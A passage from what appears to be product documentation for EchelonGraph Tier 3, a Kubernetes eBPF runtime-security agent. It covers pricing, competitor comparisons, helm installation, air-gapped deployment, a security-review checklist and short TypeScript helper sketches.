| Maintain agent upgrades (chart minor bumps) | ✓ (we publish; you helm upgrade) | — |
| Operate the SaaS dashboard / API | — | ✓ |
| Maintain ingest pipeline, storage, indexing | — | ✓ |
| Run feed updates (URLhaus, CISA KEV) | — | ✓ (agent pulls; you can air-gap) |
| Define custom compliance frameworks | ✓ | — |
| Approve auto-remediation patches | ✓ (admin RBAC) | — |
One-time onboarding (~15 min)
1. Create a KMS key. AWS: arn:aws:kms:...; GCP: projects/.../cryptoKeys/...; Vault: transit/keys/echelongraph.
2. Grant the agent's principal Encrypt + Decrypt on that key only.
3. Generate a one-time enrollment OTP in your dashboard (Settings → Agents → New).
4. helm install the chart with the OTP + KMS config. The agent auto-enrolls.
5. Verify via kubectl port-forward + /readyz (returns 200 once eBPF hooks attach).
After step 5, your dashboard's "Connected Agents" indicator goes green and findings start flowing.
Pricing model
EchelonGraph Tier 3 prices on node count, not on event volume — your cost is predictable regardless of traffic spikes.
| Plan | Price | Nodes | Includes |
|---|---|---|---|
| Team | $49/node/month | up to 50 | All T3.0–T3.10 features, AWS/GCP/Vault KMS, 30-day retention |
| Pro | $149/node/month | up to 250 | Team + 1-year retention + auto-remediation PR mode + custom compliance |
| Enterprise | Contact sales | unlimited | Pro + air-gapped install + dedicated SaaS region + custom SLA |
Volume discounts apply at 100+ / 500+ / 1000+ nodes.
Cost comparison vs. competitors
For a typical mid-size deployment (100 nodes, 50K events/sec average):
| Vendor | Annual cost (est.) | Notes |
|---|---|---|
| EchelonGraph Tier 3 (Pro) | $178,800 | $149 × 100 × 12 — flat node price |
| Sysdig Secure | ~$240,000 | Per-node + per-image scanning + per-host runtime; tiered pricing |
| Aqua CSPM + Runtime | ~$280,000 | Per-workload + per-cluster + add-on for agentless runtime |
| Falco Cloud (Sysdig) | ~$192,000 | Per-node, no auto-remediation, no compliance builder, no KMS BYOK |
| Wiz Runtime Sensor | ~$320,000+ | Bundled w/ CNAPP suite — minimum bundle pricing |
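The EchelonGraph figure in the table is plain arithmetic on the plan table above. A minimal sketch of that list-price formula; volume discounts (their tiers aren't published here) and Enterprise pricing are deliberately not modelled, and the function name is hypothetical.

```typescript
// Prices and node caps from the plan table; Enterprise is "contact sales"
// and volume discounts are not modelled.
type Plan = "team" | "pro";

const PLANS: Record<Plan, { perNodeMonthly: number; maxNodes: number }> = {
  team: { perNodeMonthly: 49, maxNodes: 50 },
  pro: { perNodeMonthly: 149, maxNodes: 250 },
};

function annualListPrice(plan: Plan, nodes: number): number {
  const p = PLANS[plan];
  if (!Number.isInteger(nodes) || nodes < 1) throw new RangeError("nodes must be a positive integer");
  if (nodes > p.maxNodes) throw new RangeError(`${plan} plan is capped at ${p.maxNodes} nodes`);
  return p.perNodeMonthly * nodes * 12; // flat per-node price, independent of event volume
}
```

Event rate never enters the formula: the 100-node Pro deployment costs the same at 50K events/sec as at ten times that.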
Why Tier 3 costs less:
- No per-image scanning charge — Tier 3 doesn't replicate the Tier 1/2 cloud + image scanning surface; that's already covered by EchelonGraph's other tiers.
- No per-event metering — your traffic spike doesn't change your bill.
- Self-hosted agent — we don't run inference servers on your data; you pay for SaaS dashboard + indexing only.
- BYOK is included — Sysdig charges $50K+ for "private cloud" SKUs that include customer-managed encryption.
Why we cost what we do
- R&D: every detection rule has a documented MITRE ATT&CK mapping, a reference to a public threat report, and an integration test. Detection quality is our moat.
- Custom compliance builder: DORA / NIS2 / CMMC / FedRAMP templates ready out-of-box. Most competitors charge add-ons.
- Hardware KMS: AWS + GCP + Vault native — not "bring a CSV of indicators" or "managed inside our cloud."
- Auto-remediation: 9 IaC patch templates with audit trail + admin approval workflow. Sysdig/Aqua charge for "remediation packages" as add-ons.
- Air-gapped support: scripts/airgap-bundle.sh ships a complete tarball; no phone-home required.
Security comparison
| Capability | Tier 3 | Sysdig | Aqua | Falco | Wiz |
|---|---|---|---|---|---|
| Zero-knowledge data plane (BYOK encryption) | ✓ | ✗ | ✗ | ✗ | ✗ |
| Kernel-level eBPF telemetry | ✓ | ✓ | ✓ | ✓ | ✓ (sensor) |
| Process monitoring + reverse-shell detection | ✓ | ✓ | ✓ | ✓ | ✓ |
| Network anomaly detection (ML-statistical) | ✓ | ✓ | ✗ | ✗ | ✓ |
| Custom compliance framework builder | ✓ | ✗ | partial | ✗ | partial |
| Auto-remediation IaC PR generation | ✓ | ✗ | ✗ | ✗ | ✗ |
| Air-gapped mode (no phone-home) | ✓ | partial | ✓ | ✓ | ✗ |
| AWS / GCP / Vault KMS integration | ✓ | ✗ | partial | ✗ | ✗ |
| Per-tenant suppression rules | ✓ | ✗ | ✗ | ✗ | ✗ |
| Threat-intel: STIX 2.1 + TAXII 2.1 native | ✓ | partial | ✗ | ✗ | partial |
| MITRE ATT&CK auto-tagging | ✓ | ✓ | ✓ | partial | ✓ |
| Privacy by design (GDPR Art. 25 / DPDP) | ✓ | partial | partial | ✗ | partial |
| Open-source customer SDK (zkdecrypt) | ✓ | ✗ | ✗ | ✓ (rule lang) | ✗ |
Three things only EchelonGraph Tier 3 does
- Zero-knowledge data plane. Your encrypted payload arrives at our infrastructure — and we cannot decrypt it. Sysdig/Aqua/Wiz all have access to your raw event data; Falco runs entirely on-prem (no SaaS analytics).
- End-to-end auto-remediation with admin approval. Detect → generate IaC patch (Terraform / K8s / Helm) → open PR → admin approves → apply. Sysdig + Aqua have advisory remediation; only ours closes the loop while keeping a full audit trail.
- Customer-defined compliance frameworks. DORA / NIS2 / CMMC / FedRAMP templates plus the option to build your own (versioned, immutable-once-published, JSON portable). Sysdig/Aqua ship fixed framework catalogs.
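The "generate IaC patch" step is template substitution. A minimal sketch of rendering the deny-egress NetworkPolicy from the incident walkthrough; the function name and the Finding shape are hypothetical, and this is not the T3.7 template engine itself.

```typescript
// Hypothetical input shape for the template.
interface Finding {
  id: string;
  ruleId: string;
  namespace: string;
  appLabel: string;
}

function denyEgressPolicy(f: Finding) {
  return {
    apiVersion: "networking.k8s.io/v1",
    kind: "NetworkPolicy",
    metadata: {
      // "f-9d4e2a17" becomes "...-incident-f9d4e2a17" (hyphens dropped from the ID)
      name: `deny-egress-${f.appLabel}-incident-${f.id.replace(/-/g, "")}`,
      namespace: f.namespace,
      annotations: {
        "echelongraph.io/finding": f.id,
        "echelongraph.io/rule": f.ruleId,
      },
    },
    spec: {
      podSelector: { matchLabels: { app: f.appLabel } },
      policyTypes: ["Egress"],
      egress: [], // Egress listed with no rules: all outbound traffic is denied
    },
  };
}
```

JSON.stringify of the result is a valid manifest for the PR, since kubectl accepts JSON as well as YAML. An empty egress list also blocks DNS, and enforcement requires a CNI plugin that implements NetworkPolicy.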
Installation
1. Pull the chart
helm pull oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0
2. Configure KMS
Pick one provider — see the per-provider setup guide:
- AWS KMS: AWS KMS Setup
- GCP Cloud KMS: GCP Setup
- HashiCorp Vault Transit: Vault Setup
3. Enroll + install
export ECHELON_AGENT_ENROLL_TOKEN="<otp from dashboard>"
helm upgrade --install echelongraph-tier3 \
oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0 \
-n echelongraph-system --create-namespace \
--set tenant.id="<your-tenant-id>" \
--set secrets.encryptionKey="$(openssl rand -hex 32)" \
  --set secrets.enrollmentToken="$ECHELON_AGENT_ENROLL_TOKEN" \
--set secrets.enrollmentEndpoint="https://app.echelongraph.io" \
--set ingester.address="ingest.echelongraph.io:443"
# For an external KMS provider (AWS/GCP/Vault) instead of the in-cluster BYOK
# key, configure it per the KMS setup links in step 2.
4. Verify
kubectl get pods -n echelongraph-system
# tier3-master-xxx 1/1 Running
# tier3-tentacle-xxx 1/1 Running per node
# Health (port-forward — agent images are distroless, no shell)
kubectl port-forward -n echelongraph-system deploy/tier3-master 8087:8087 &
curl -sS http://localhost:8087/readyz
# 200 OK once eBPF hooks attach + ingester reachable
In your EchelonGraph dashboard, the agent should show "Connected" within 30 seconds.
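In automation (a CI job or install script) the same readiness check is usually wrapped in a retry loop. A minimal sketch, assuming the port-forward above is running on localhost:8087; the attempt count and delay are arbitrary, and the fetcher is injected so the loop can be tested without a cluster.

```typescript
// Poll /readyz until it returns 200 or attempts run out.
type Fetcher = (url: string) => Promise<{ status: number }>;

async function waitForReady(url: string, fetcher: Fetcher, attempts = 30, delayMs = 2000): Promise<boolean> {
  for (let i = 0; i < attempts; i++) {
    try {
      if ((await fetcher(url)).status === 200) return true;
    } catch {
      // connection refused while the port-forward or agent is still starting
    }
    if (i < attempts - 1) await new Promise((resolve) => setTimeout(resolve, delayMs));
  }
  return false;
}
```

With the global fetch this is waitForReady("http://localhost:8087/readyz", (u) => fetch(u)).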
Air-gapped customers
For environments with no outbound internet (regulated finance, government, defense):
# 1. On a connected machine, build the bundle.
./scripts/airgap-bundle.sh --version=1.10.1 --include-ioc
# 2. Transfer the .tar.zst to your air-gapped network.
# 3. Load images into your private registry.
# 4. helm install with TIER3_AIRGAPPED=true and image overrides.
The bundle includes:
- Master + Tentacle Docker images
- Helm chart (.tgz)
- Grafana dashboard JSON
- Prometheus alert rules
- (Optional) IOC database snapshot at bundle time
What customers do NOT need to do
- No CVE database maintenance. Tier 3 pulls abuse.ch URLhaus + Feodo Tracker + CISA KEV automatically (every 6h). Air-gapped customers ship snapshots in the bundle.
- No anomaly model training. The statistical baseline (24h rolling window + EWMA + seasonality) is fully unsupervised; warm-up takes 24h after install.
- No rule authoring for the basics. 30+ detection rules ship out-of-box (T3.4 process + T3.5 anomaly + T3.6 IOC). Custom rules are optional.
- No extra on-call tooling. The PrometheusRule alerts we ship route through your existing Alertmanager to PagerDuty / Slack / email.
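The "no training" point holds because an EWMA baseline needs no labelled data: it just tracks a moving mean and variance. A minimal spike-detector sketch follows; alpha, threshold, and warm-up length are illustrative assumptions, and the T3.5 engine's 24h window and seasonality handling are not reproduced.

```typescript
// Minimal EWMA spike detector. ASSUMPTIONS: parameters are illustrative;
// the T3.5 engine's 24h baseline and seasonality are not reproduced.
class EwmaDetector {
  private mean = 0;
  private variance = 0;
  private seen = 0;
  private readonly alpha: number;
  private readonly threshold: number;
  private readonly warmup: number;

  constructor(alpha = 0.1, threshold = 3, warmup = 30) {
    this.alpha = alpha;         // weight of the newest sample
    this.threshold = threshold; // z-score above which a sample counts as a spike
    this.warmup = warmup;       // samples to observe before any alert can fire
  }

  /** Feed one sample (e.g. bytes/min for a pod); returns true if it is a spike. */
  update(x: number): boolean {
    this.seen++;
    if (this.seen === 1) {
      this.mean = x;
      return false;
    }
    const std = Math.sqrt(this.variance);
    const isSpike = this.seen > this.warmup && std > 0 && (x - this.mean) / std > this.threshold;
    // Incremental EWMA update of mean and variance.
    const diff = x - this.mean;
    const incr = this.alpha * diff;
    this.mean += incr;
    this.variance = (1 - this.alpha) * (this.variance + diff * incr);
    return isSpike;
  }
}
```

The warm-up guard plays the role of the 24h warm-up described above: until enough samples exist, the variance estimate is too noisy to alert on.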
Operational reference
| Doc | Topic |
|---|---|
| TIER3_DEPLOYMENT.md | Customer install + config + troubleshooting catalog |
| TIER3_KMS_SETUP.md | AWS / GCP / Vault setup with IAM permissions per provider |
| TIER3_BACKUP_RESTORE.md | Postgres + ClickHouse export/import + RTO/RPO matrix |
| UPGRADING.md | Version compatibility matrix + per-version migration list |
| CHANGELOG.md | Full release history |
Confidence checklist for security review
If your security team is evaluating Tier 3, here's the audit trail they typically request:
- [ ] eBPF verifier compliance — every program is loaded via cilium/ebpf with the kernel verifier; programs that fail validation are rejected at load time.
- [ ] Not fully privileged by default — tentacle runs with a scoped capability set (CAP_SYS_ADMIN, CAP_BPF, CAP_NET_ADMIN) instead of a fully privileged container; note that CAP_SYS_ADMIN is itself a broad capability. Full privilege is an opt-in escape hatch for restrictive kernels only. No host filesystem write. No host network.
- [ ] Customer-managed encryption keys — TIER3_KMS_PROVIDER chooses your KMS; envelope encryption uses a per-event DEK wrapped by your KEK. We document that we never see plaintext.
- [ ] Open-source SDKs — sdk/zkdecrypt (Go) and frontend/src/lib/zkdecrypt (TypeScript, in-browser) are the decryption paths; both are auditable.
- [ ] No outbound from the agent beyond ingest.echelongraph.io:443. Air-gapped mode disables even that.
- [ ] License feature flags — every paid feature is gated behind a license claim signed by EchelonGraph; rotation supported.
- [ ] Open-source threat-intel feeds — abuse.ch + CISA KEV are public; the agent never sends *your* findings to those upstream services.
- [ ] Audit log for every admin-grade action (remediation approve, framework publish, agent enrollment).
Uninstall
helm uninstall echelongraph-tier3 -n echelongraph-system
kubectl delete namespace echelongraph-system
The agent self-zeroes its DEK on shutdown. Wrapped DEKs in our backend remain (we can't decrypt them anyway); for full removal, contact support@echelongraph.io with a tenant deletion request and we'll delete your tenant's ciphertext rows.